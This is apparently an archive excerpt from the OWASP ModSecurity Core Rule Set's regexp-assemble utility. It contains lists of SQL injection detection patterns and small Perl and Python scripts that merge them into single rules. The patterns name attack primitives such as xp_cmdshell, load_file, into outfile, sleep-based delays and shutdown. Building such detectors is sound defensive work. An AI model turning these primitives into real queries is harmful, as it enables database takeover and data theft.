������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942260.data���������������������������������������0000664�0000000�0000000�00000001527�14461225151�0023615�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������union\s*?\s*?[([]*?\s*?select\s+ union\s*?all\s*?[([]*?\s*?select\s+ union\s*?distinct\s*?[([]*?\s*?select\s+ union\s*?[(!@]*?\s*?[([]*?\s*?select\s+ \w\s+like\s+[\"'`] like\s*?[\"'`]\% [\"'`]\s*?like\W*?[\"'`\d] [\"'`]\s*?and\s+[\s\w]+=\s*?\w+\s*?having\s+ [\"'`]\s*?nand\s+[\s\w]+=\s*?\w+\s*?having\s+ [\"'`]\s*?or\s+[\s\w]+=\s*?\w+\s*?having\s+ [\"'`]\s*?xor\s+[\s\w]+=\s*?\w+\s*?having\s+ [\"'`]\s*?xxor\s+[\s\w]+=\s*?\w+\s*?having\s+ [\"'`]\s*?div\s+[\s\w]+=\s*?\w+\s*?having\s+ [\"'`]\s*?like\s+[\s\w]+=\s*?\w+\s*?having\s+ [\"'`]\s*?between\s+[\s\w]+=\s*?\w+\s*?having\s+ [\"'`]\s*?not\s+[\s\w]+=\s*?\w+\s*?having\s+ [\"'`]\s*?\|\|\s+[\s\w]+=\s*?\w+\s*?having\s+ [\"'`]\s*?\&\&\s+[\s\w]+=\s*?\w+\s*?having\s+ [\"'`]\s*?\*\s*?\w+\W+[\"'`] [\"'`]\s*?[^?\w\s=.,;)(]++\s*?[(@\"'`]*?\s*?\w+\W+\w select\s+?[\[\]()\s\w\.,\"'`-]+from\s+ find_in_set\s*?\( 
�������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942280.data���������������������������������������0000664�0000000�0000000�00000000226�14461225151�0023612�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������select\s*?pg_sleep waitfor\s*?delay\s?[\"'`]+\s?\d ;\s*?shutdown\s*?; ;\s*?shutdown\s*?-- ;\s*?shutdown\s*?# ;\s*?shutdown\s*?\/\* ;\s*?shutdown\s*?{ ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942300.data���������������������������������������0000664�0000000�0000000�00000000444�14461225151�0023605�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������\)\s*?when\s*?\d+\s*?then [\"'`]\s*?# [\"'`]\s*?-- [\"'`]\s*?{ \/\*!\s?\d+ char\s*?\(\s*?\d chr\s*?\(\s*?\d and\s+\s*?\w+\( nand\s+\s*?\w+\( or\s+\s*?\w+\( xor\s+\s*?\w+\( xxor\s+\s*?\w+\( div\s+\s*?\w+\( like\s+\s*?\w+\( between\s+\s*?\w+\( not\s+\s*?\w+\( \|\|\s+\s*?\w+\( \&\&\s+\s*?\w+\( 
����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942310.data���������������������������������������0000664�0000000�0000000�00000000464�14461225151�0023610�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������[\"'`]\s+and\s*?=\W \(\s*?select\s*?\w+\s*?\( \*\/from \+\s*?\d+\s*?\+\s*?@ \w[\"'`]\s*?(?:[-+=|@]+\s+?)+[\d(] \w[\"'`]\s*?[-+=|@]+[\d(] coalesce\s*?\( @@\w+\s*?[^\w\s] \W!+[\"'`]\w [\"'`];\s*?if [\"'`];\s*?while [\"'`];\s*?begin [\"'`][\s\d]+=\s*?\d order\s+by\s+if\w*?\s*?\( [\s(]+case\d*?\W.+[tw]hen[\s(] ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942320.data���������������������������������������0000664�0000000�0000000�00000000301�14461225151�0023577�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������create\s+function\s*?\w+\s*?\(\s*?\)\s*?- create\s+procedure\s*?\w+\s*?\(\s*?\)\s*?- declare[^\w]+[@#]\s*?\w+ exec\s*?\(\s*?@ procedure\s+analyse\s*?\( ;\s*?declare\s+[\w-]+ ;\s*?open\s+[\w-]+ 
�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942330.data���������������������������������������0000664�0000000�0000000�00000003451�14461225151�0023611�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������[\"'`]\s*?or\s*?[\"'`]?\d [\"'`]\s*?xor\s*?[\"'`]?\d [\"'`]\s*?div\s*?[\"'`]?\d [\"'`]\s*?like\s*?[\"'`]?\d [\"'`]\s*?between\s*?[\"'`]?\d [\"'`]\s*?and\s*?[\"'`]?\d \\\\x(?:23|27|3d) ^.?[\"'`]$ ^[\"'`\\\\]*?[\d\"'`]+\s*?and\s*?[\w\"'`][+&!@(),.-] ^[\"'`\\\\]*?[\d\"'`]+\s*?nand\s*?[\w\"'`][+&!@(),.-] ^[\"'`\\\\]*?[\d\"'`]+\s*?or\s*?[\w\"'`][+&!@(),.-] ^[\"'`\\\\]*?[\d\"'`]+\s*?xor\s*?[\w\"'`][+&!@(),.-] ^[\"'`\\\\]*?[\d\"'`]+\s*?xxor\s*?[\w\"'`][+&!@(),.-] ^[\"'`\\\\]*?[\d\"'`]+\s*?div\s*?[\w\"'`][+&!@(),.-] ^[\"'`\\\\]*?[\d\"'`]+\s*?like\s*?[\w\"'`][+&!@(),.-] ^[\"'`\\\\]*?[\d\"'`]+\s*?between\s*?[\w\"'`][+&!@(),.-] ^[\"'`\\\\]*?[\d\"'`]+\s*?not\s*?[\w\"'`][+&!@(),.-] ^[\"'`\\\\]*?[\d\"'`]+\s*?\|\|\s*?[\w\"'`][+&!@(),.-] ^[\"'`\\\\]*?[\d\"'`]+\s*?\&\&\s*?[\w\"'`][+&!@(),.-] ^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?and\s*?[\w\"'`][+&!@(),.-] ^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?nand\s*?[\w\"'`][+&!@(),.-] ^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?or\s*?[\w\"'`][+&!@(),.-] ^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?xor\s*?[\w\"'`][+&!@(),.-] ^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?xxor\s*?[\w\"'`][+&!@(),.-] ^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?div\s*?[\w\"'`][+&!@(),.-] 
^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?like\s*?[\w\"'`][+&!@(),.-] ^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?between\s*?[\w\"'`][+&!@(),.-] ^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?not\s*?[\w\"'`][+&!@(),.-] ^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?\|\|\s*?[\w\"'`][+&!@(),.-] ^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?\&\&\s*?[\w\"'`][+&!@(),.-] [^\w\s]\w+\s*?[|-]\s*?[\"'`]\s*?\w @\w+\s+and\s*?[\"'`\d]+ @\w+\s+or\s*?[\"'`\d]+ @\w+\s+xor\s*?[\"'`\d]+ @\w+\s+div\s*?[\"'`\d]+ @\w+\s+like\s*?[\"'`\d]+ @\w+\s+between\s*?[\"'`\d]+ @[\w-]+\sand\s*?[^\w\s] @[\w-]+\sor\s*?[^\w\s] @[\w-]+\sxor\s*?[^\w\s] @[\w-]+\sdiv\s*?[^\w\s] @[\w-]+\slike\s*?[^\w\s] @[\w-]+\sbetween\s*?[^\w\s] [^\w\s:]\s*?\d\W+[^\w\s]\s*?[\"'`]. \Winformation_schema table_name\W �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942340.data���������������������������������������0000664�0000000�0000000�00000001135�14461225151�0023607�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������in\s*?[(]+\s*?select (?i:n?and|x?x?or|div|like|between|not|\|\||\&\&)\s+[\s\w+]+regexp\s*?\( (?i:n?and|x?x?or|div|like|between|not|\|\||\&\&)\s+[\s\w+]+sounds\s+like\s*?[\"'`] (?i:n?and|x?x?or|div|like|between|not|\|\||\&\&)\s+[\s\w+]+[=\d]+x [\"'`]\s*?\d\s*?-- [\"'`]\s*?\d\s*?# [\"'`][\%&<>^=]+\d\s*?= [\"'`][\%&<>^=]+\d\s*?or [\"'`][\%&<>^=]+\d\s*?xor [\"'`][\%&<>^=]+\d\s*?div [\"'`][\%&<>^=]+\d\s*?like [\"'`][\%&<>^=]+\d\s*?between [\"'`][\%&<>^=]+\d\s*?and [\"'`]\W+[\w+-]+\s*?=\s*?\d\W+[\"'`] [\"'`]\s*?is\s*?\d.+[\"'`]?\w [\"'`][|]?[\w-]{3,}[^\w\s.,]+[\"'`] 
[\"'`]\s*?is\s*?[\d.]+\s*?\W.*?[\"'`] �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942350.data���������������������������������������0000664�0000000�0000000�00000000512�14461225151�0023606�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������create\s+function\s+.+\s+returns ;\s*?alter\b\s*?[\[(]?\w{2,} ;\s*?create\b\s*?[\[(]?\w{2,} ;\s*?delete\b\s*?[\[(]?\w{2,} ;\s*?desc\b\s*?[\[(]?\w{2,} ;\s*?insert\b\s*?[\[(]?\w{2,} ;\s*?load\b\s*?[\[(]?\w{2,} ;\s*?rename\b\s*?[\[(]?\w{2,} ;\s*?select\b\s*?[\[(]?\w{2,} ;\s*?truncate\b\s*?[\[(]?\w{2,} ;\s*?update\b\s*?[\[(]?\w{2,} 
��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942360.data���������������������������������������0000664�0000000�0000000�00000007434�14461225151�0023621�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������alter\s+char\s?[(]? alter\s+group_concat\s?[(]? alter\s+load_file\s?[(]? create\s+char\s?[(]? create\s+group_concat\s?[(]? create\s+load_file\s?[(]? delete\s+char\s?[(]? delete\s+group_concat\s?[(]? delete\s+load_file\s?[(]? desc\s+char\s?[(]? desc\s+group_concat\s?[(]? desc\s+load_file\s?[(]? insert\s+char\s?[(]? insert\s+group_concat\s?[(]? insert\s+load_file\s?[(]? load\s+char\s?[(]? load\s+group_concat\s?[(]? load\s+load_file\s?[(]? rename\s+char\s?[(]? rename\s+group_concat\s?[(]? rename\s+load_file\s?[(]? select\s+char\s?[(]? select\s+group_concat\s?[(]? select\s+load_file\s?[(]? truncate\s+char\s?[(]? truncate\s+group_concat\s?[(]? truncate\s+load_file\s?[(]? update\s+char\s?[(]? update\s+group_concat\s?[(]? update\s+load_file\s?[(]? 
end\s*?\); [\s(]load_file\s*?\( [\"'`]\s+regexp\W [\d\W]\s+as\b\s*[\"'`\w]+\s*\bfrom ^[\W\d]+\s*?create\s+\w+ ^[\W\d]+\s*?delete\b ^[\W\d]+\s*?desc\b ^[\W\d]+\s*?insert\b ^[\W\d]+\s*?load\b ^[\W\d]+\s*?rename\b ^[\W\d]+\s*?select\b ^[\W\d]+\s*?truncate\b ^[\W\d]+\s*?update\b ^[\W\d]+\s*?alter\s*aggregate\b ^[\W\d]+\s*?alter\s*application\s*role\b ^[\W\d]+\s*?alter\s*assembly\b ^[\W\d]+\s*?alter\s*asymmetric\s*key\b ^[\W\d]+\s*?alter\s*audit\b ^[\W\d]+\s*?alter\s*authorization\b ^[\W\d]+\s*?alter\s*availability\s*group\b ^[\W\d]+\s*?alter\s*broker\s*priority\b ^[\W\d]+\s*?alter\s*bufferpool\b ^[\W\d]+\s*?alter\s*certificate\b ^[\W\d]+\s*?alter\s*cluster\b ^[\W\d]+\s*?alter\s*collation\b ^[\W\d]+\s*?alter\s*column\b ^[\W\d]+\s*?alter\s*conversion\b ^[\W\d]+\s*?alter\s*credential\b ^[\W\d]+\s*?alter\s*cryptographic\s*provider\b ^[\W\d]+\s*?alter\s*database\b ^[\W\d]+\s*?alter\s*default\b ^[\W\d]+\s*?alter\s*dimension\b ^[\W\d]+\s*?alter\s*diskgroup\b ^[\W\d]+\s*?alter\s*domain\b ^[\W\d]+\s*?alter\s*endpoint\b ^[\W\d]+\s*?alter\s*extension\b ^[\W\d]+\s*?alter\s*external\b ^[\W\d]+\s*?alter\s*event\b ^[\W\d]+\s*?alter\s*flashback\b ^[\W\d]+\s*?alter\s*foreign\b ^[\W\d]+\s*?alter\s*fulltext\b ^[\W\d]+\s*?alter\s*function\b ^[\W\d]+\s*?alter\s*hierarchy\b ^[\W\d]+\s*?alter\s*group\b ^[\W\d]+\s*?alter\s*histogram\b ^[\W\d]+\s*?alter\s*index\b ^[\W\d]+\s*?alter\s*indextype\b ^[\W\d]+\s*?alter\s*inmemory\b ^[\W\d]+\s*?alter\s*instance\b ^[\W\d]+\s*?alter\s*java\b ^[\W\d]+\s*?alter\s*language\b ^[\W\d]+\s*?alter\s*large\b ^[\W\d]+\s*?alter\s*library\b ^[\W\d]+\s*?alter\s*lockdown\b ^[\W\d]+\s*?alter\s*logfile\s*group\b ^[\W\d]+\s*?alter\s*login\b ^[\W\d]+\s*?alter\s*mask\b ^[\W\d]+\s*?alter\s*master\s*key\b ^[\W\d]+\s*?alter\s*materialized\b ^[\W\d]+\s*?alter\s*message\s*type\b ^[\W\d]+\s*?alter\s*method\b ^[\W\d]+\s*?alter\s*module\b ^[\W\d]+\s*?alter\s*nickname\b ^[\W\d]+\s*?alter\s*operator\b ^[\W\d]+\s*?alter\s*outline\b ^[\W\d]+\s*?alter\s*package\b 
^[\W\d]+\s*?alter\s*partition\b ^[\W\d]+\s*?alter\s*permission\b ^[\W\d]+\s*?alter\s*procedure\b ^[\W\d]+\s*?alter\s*profile\b ^[\W\d]+\s*?alter\s*queue\b ^[\W\d]+\s*?alter\s*remote\b ^[\W\d]+\s*?alter\s*resource\b ^[\W\d]+\s*?alter\s*role\b ^[\W\d]+\s*?alter\s*rollback\b ^[\W\d]+\s*?alter\s*route\b ^[\W\d]+\s*?alter\s*schema\b ^[\W\d]+\s*?alter\s*search\b ^[\W\d]+\s*?alter\s*security\b ^[\W\d]+\s*?alter\s*server\b ^[\W\d]+\s*?alter\s*service\b ^[\W\d]+\s*?alter\s*sequence\b ^[\W\d]+\s*?alter\s*session\b ^[\W\d]+\s*?alter\s*symmetric\s*key\b ^[\W\d]+\s*?alter\s*synonym\b ^[\W\d]+\s*?alter\s*stogroup\b ^[\W\d]+\s*?alter\s*table\b ^[\W\d]+\s*?alter\s*tablespace\b ^[\W\d]+\s*?alter\s*text\b ^[\W\d]+\s*?alter\s*threshold\b ^[\W\d]+\s*?alter\s*trigger\b ^[\W\d]+\s*?alter\s*trusted\b ^[\W\d]+\s*?alter\s*type\b ^[\W\d]+\s*?alter\s*usage\b ^[\W\d]+\s*?alter\s*user\b ^[\W\d]+\s*?alter\s*view\b ^[\W\d]+\s*?alter\s*work\b ^[\W\d]+\s*?alter\s*workload\b ^[\W\d]+\s*?alter\s*wrapper\b ^[\W\d]+\s*?alter\s*xml\s*schema\b ^[\W\d]+\s*?alter\s*xsrobject\b ^[\W\d]+\s*?union\s*all\b ^[\W\d]+\s*?union\s*select\b ^[\W\d]+\s*?union\s*distinct\b ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942370.data���������������������������������������0000664�0000000�0000000�00000001113�14461225151�0023606�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������[\"'`]\s*?\*.+or\W*?[\"'`]\d [\"'`]\s*?\*.+xor\W*?[\"'`]\d [\"'`]\s*?\*.+div\W*?[\"'`]\d [\"'`]\s*?\*.+like\W*?[\"'`]\d 
[\"'`]\s*?\*.+between\W*?[\"'`]\d [\"'`]\s*?\*.+and\W*?[\"'`]\d [\"'`]\s*?\*.+id\W*?[\"'`]\d \^[\"'`] [\"'`]\s*?[^\w\s?]+\s*?[^\w\s]+\s*?[\"'`] [\"'`]\s*?[^\w\s]+\s*?[\W\d].*?# [\"'`]\s*?[^\w\s]+\s*?[\W\d].*?-- [\"'`].*?\*\s*?\d [\"'`]\s*?or\s[^\d]+[\w-]+.*?\d [\"'`]\s*?xor\s[^\d]+[\w-]+.*?\d [\"'`]\s*?div\s[^\d]+[\w-]+.*?\d [\"'`]\s*?like\s[^\d]+[\w-]+.*?\d [\"'`]\s*?between\s[^\d]+[\w-]+.*?\d [\"'`]\s*?and\s[^\d]+[\w-]+.*?\d [()\*<>%+-][\w-]+[^\w\s]+[\"'`][^,] �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942380.data���������������������������������������0000664�0000000�0000000�00000000765�14461225151�0023623�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������\b(?i:having)\b\s+\d{1,10}\s*?[=<>] \b(?i:having)\b\s+'[^=]{1,10}'\s*?[=<>] (?i:\bexecute\() (?i:\bexecute\s{1,5}[\w\.$]{1,5}\s{0,3}) \bhaving\b ?\d{1,10} ?[=<>]+ \bhaving\b ?[\'\"][^=]{1,10}[\'\" ?[=<>]+ (?i:\bcreate\s+?table.{0,20}?\() (?i:\blike\W*?char\W*?\() (?i:select.*?case) (?i:from.*?limit) (?i:order\sby) exists\s\sselect exists\sselect\Sif\s\( exists\sselect\Sifnull\s\( exists\sselect\Stop exists\sselect\Sconcat exists\ssystem\s\( exists\s\b(?i:having)\b\s+\d{1,10} exists\s'[^=]{1,10}' 
�����������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942390.data���������������������������������������0000664�0000000�0000000�00000000571�14461225151�0023617�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������(?i:\bor\b ?\d{1,10} ?[=<>]+) (?i:\bor\b ?[\'\"][^=]{1,10}[\'\"] ?[=<>]+) (?i:'\s+or\s+.{1,20}[+\-!<>=]) (?i:'\s+xor\s+.{1,20}[+\-!<>=]) \b(?i:or)\b\s+\d{1,10} \b(?i:or)\b\s+'[^=]{1,10}' \b(?i:xor)\b\s+\d{1,10} \b(?i:xor)\b\s+'[^=]{1,10}' \b(?i:or)\b\s+\d{1,10}\s*?[=<>] \b(?i:xor)\b\s+\d{1,10}\s*?[=<>] \b(?i:or)\b\s+'[^=]{1,10}'\s*?[=<>] \b(?i:xor)\b\s+'[^=]{1,10}'\s*?[=<>] ���������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942400.data���������������������������������������0000664�0000000�0000000�00000000250�14461225151�0023601�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������\band\b\s+\d{1,10}\s*?[=<>] \band\b\s+'[^=]{1,10}'\s*?[=<>] \band\b\s+\d{1,10} \band\b\s+'[^=]{1,10}' \band\b ?\d{1,10} ?[=<>]+ \band\b ?[\'\"][^=]{1,10}[\'\"] ?[=<>]+ 
��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942410.data���������������������������������������0000664�0000000�0000000�00000003733�14461225151�0023613�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������abs acos adddate addtime aes_decrypt aes_encrypt asin ascii asciistr atan atan2 avg benchmark bin bin_to_num bit_and bit_count bit_length bit_or bit_xor cast char character_length char_length charset chr ciel cieling coalesce coercibility compress concat concat_ws connection_id conv convert convert_tz cos cot count cr32 curdate current_date current_time current_timestamp current_user curtime database date date_add datediff date_format date_sub day dayname dayofmonth dayofweek dayofyear dcount decode default degrees des_decrypt des_encrypt dump elt encode encrypt exp export_set extract extractvalue field field_in_set find_in_set floor format found_rows from_base64 from_days from_unixtime get_format get_lock greatest group_concat hex hextoraw hour if ifnull in inet6_aton inet6_ntoa inet_aton inet_ntoa insert instr interval is is_free_lock is_ipv4 is_ipv4_compat is_ipv4_mapped is_ipv6 is_not is_not_null isnull is_null is_used_lock last last_day last_insert_id lcase least left length ln load_file local localtimestamp locate log log10 log2 lower lpad ltrim makedate make_set master_pos_wait max md5 microsecond mid min minute mod 
month monthname name_const not_in now nullif oct octet_length old_password ord password period_add period_diff pg_sleep pi position pow power procedure_analyse quarter quote radians rand rawtohex rawtonhex rawtonhextoraw release_lock repeat replace reverse right round row_count rpad rtrim schema second sec_to_time session_user sha sha1 sha2 sign sin sleep soundex space sqrt std stddev stddev_pop stddev_samp strcmp str_to_date subdate substr substring substring_index subtime sum sysdate system_user tan time timediff time_format timestamp timestampadd timestampdiff time_to_sec to_base64 to_char to_days to_nchar to_seconds trim truncate ucase uncompress uncompressed_length unhex unix_timestamp updatexml upper user utc_date utc_time utc_timestamp uuid uuid_short values variance var_pop var_samp version week weekday weekofyear weight_string xmltype year yearweek �������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942470.data���������������������������������������0000664�0000000�0000000�00000001163�14461225151�0023614�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������autonomous_transaction dba_users dbms_java nvarchar openowa_util openquery openrowset sp_addextendedproc sp_execute sp_executesql sp_help sp_is_srvrolemember sp_makewebtask sp_oacreate sp_password sp_prepare sp_replwritetovarbin sp_sqlexec sql_longvarchar sql_variant tbcreator utl_file utl_http varchar xp_availablemedia xp_cmdshell xp_dirtree xp_enumdsn xp_execresultset xp_filelist xp_loginconfig xp_makecab xp_ntsec xp_ntsec_enumdomains xp_regaddmultistring xp_regdeletekey xp_regdeletevalue xp_regenumkeys xp_regenumvalues xp_regread xp_regremovemultistring xp_regwrite 
xp_servicecontrol xp_terminate xp_terminate_process �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942480.data���������������������������������������0000664�0000000�0000000�00000001333�14461225151�0023614�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������\bdbms_\w+\.\b \bdelete\b\W*?\bfrom\b \bgroup\b.*?\bby\b.{1,100}?\bhaving\b \binner\b\W*?\bjoin\b \binsert\b\W*?\binto\b \binto\b\W*?\bdumpfile\b \binto\b\W*?\boutfile\b \bload\b\W*?\bdata\b.*?\binfile\b \bprint\b\W*?\@\@ \bselect\b.{1,100}?\b.*?\bdump\b.*\bfrom\b \bselect\b.{1,100}?\bcount\b.{1,100}?\bfrom\b \bselect\b.{1,100}?\bdata_type\b \bselect\b.{1,100}?\bfrom\b.{1,100}?\bwhere\b \bselect\b.{1,100}?\binstr\b \bselect\b.{1,100}?\blength\b.{1,100}?\bfrom\b \bselect\b.{1,100}?\bto_char\b \bselect\b.{1,100}?\bto_number\b \bselect\b.{1,100}?\btop\b.{1,100}?\bfrom\b \bsys_context\b \bunion\b.{1,100}?\bselect\b \butl_inaddr\b collation\W*?\(a\b 'dbo' 'msdasql' 'sa' 'sqloledb' \@\@version\b ;\W*?\bdrop\b ;\W*?\bshutdown\b 
�����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-assemble-v2.pl������������������������������������0000775�0000000�0000000�00000001311�14461225151�0024663�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env perl # # Create one regexp from a set of regexps. # Regexps can be submitted via standard input, one per line. # # Requires Regexp::Assemble Perl module. # To install: cpan install Regexp::Assemble # # See: https://coreruleset.org/20190826/optimizing-regular-expressions/ # use strict; use Regexp::Assemble; my $ra = Regexp::Assemble->new; while (<>) { # Handle possessive qualifiers # https://rt.cpan.org/Public/Bug/Display.html?id=50228#txn-672717 my $arr = $ra->lexstr($_); for (my $n = 0; $n < $#$arr - 1; ++$n) { if ($arr->[$n] =~ /\+$/ and $arr->[$n + 1] eq '+') { $arr->[$n] .= splice(@$arr, $n + 1, 1); } } $ra->insert(@$arr); } print $ra->as_string() . 
"\n"; �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-assemble.pl���������������������������������������0000775�0000000�0000000�00000000643�14461225151�0024345�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env perl # # Create one regexp from a set of regexps. # Regexps can be submitted via standard input, one per line. # # Requires Regexp::Assemble Perl module. # To install: cpan install Regexp::Assemble # # See: https://coreruleset.org/20190826/optimizing-regular-expressions/ # use strict; use Regexp::Assemble; my $ra = Regexp::Assemble->new; while (<>) { $ra->add($_); } print $ra->as_string() . "\n"; ���������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-cmdline.py����������������������������������������0000775�0000000�0000000�00000003705�14461225151�0024204�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python # # Convert a word list to a list of regexps usable by Regexp::Assemble. 
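#
# Examples:
# cat regexp-932100.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl
# cat regexp-932110.txt | ./regexp-cmdline.py windows | ./regexp-assemble.pl
# cat regexp-932150.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl
#
# Refer to rule 932100, 932110, 932150 for documentation.
#

import fileinput, string, sys

# Convert a single line to regexp format, and insert anti-cmdline
# evasions between characters.
def regexp_str(str, evasion):
    """Turn one word-list entry into a regexp fragment.

    str     -- the entry, already stripped of its newline and comment.
    evasion -- regexp text inserted between every pair of characters.

    Returns the fragment as a string. An empty entry yields an empty
    string instead of raising IndexError.
    """
    # By convention, if the line starts with ' char, copy the rest
    # verbatim. Verbatim entries get neither escaping nor the evasion
    # sequence, so whoever writes them must put any needed anti-evasion
    # handling into the pattern by hand.
    if str[:1] == "'":
        return str[1:]

    # join() puts the evasion sequence between characters only, never
    # before the first or after the last one.
    return evasion.join(regexp_char(char, evasion) for char in str)

# Ensure that some special characters are escaped
def regexp_char(char, evasion):
    """Map one character of a word-list entry to its regexp form.

    char    -- the character to convert.
    evasion -- not used here; kept so the signature stays unchanged.

    Returns the regexp text for that character.
    """
    # Only '.' and '-' are escaped. Every other regexp metacharacter in
    # an entry is passed through unchanged, so an entry that needs one
    # matched literally has to use the leading-' verbatim form and carry
    # its own escaping.
    # Raw strings keep the backslashes literal; the plain-string forms of
    # these escapes are invalid escape sequences that newer Python
    # versions warn about.
    char = char.replace('.', r'\.')
    char = char.replace('-', r'\-')
    # '+' in an entry stands for an argument separator in the Unix lists:
    # whitespace, '<' or '>', followed by anything.
    char = char.replace('+', r'''(?:\s|<|>).*''')
    # '@' is the Windows counterpart and additionally accepts ',', ';',
    # '.' and '/' as the separator.
    char = char.replace('@', r'''(?:[\s,;]|\.|/|<|>).*''')
    # Ensure multiple spaces are matched
    char = char.replace(' ', r'\s+')
    return char

# Insert these sequences between characters to prevent evasion.
# This emulates the relevant parts of t:cmdLine.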
evasions = { 'unix': r'''[\\\\'\"]*''', 'windows': r'''[\"\^]*''', } # Parse arguments if len(sys.argv) <= 1 or not sys.argv[1] in evasions: print(sys.argv[0] + ' unix|windows [infile]') sys.exit(1) evasion = evasions[sys.argv[1]] del sys.argv[1] # Process lines from input file, or if not specified, standard input for line in fileinput.input(): line = line.rstrip('\n ') line = line.split('#')[0] if line != '': print(regexp_str(line, evasion)) 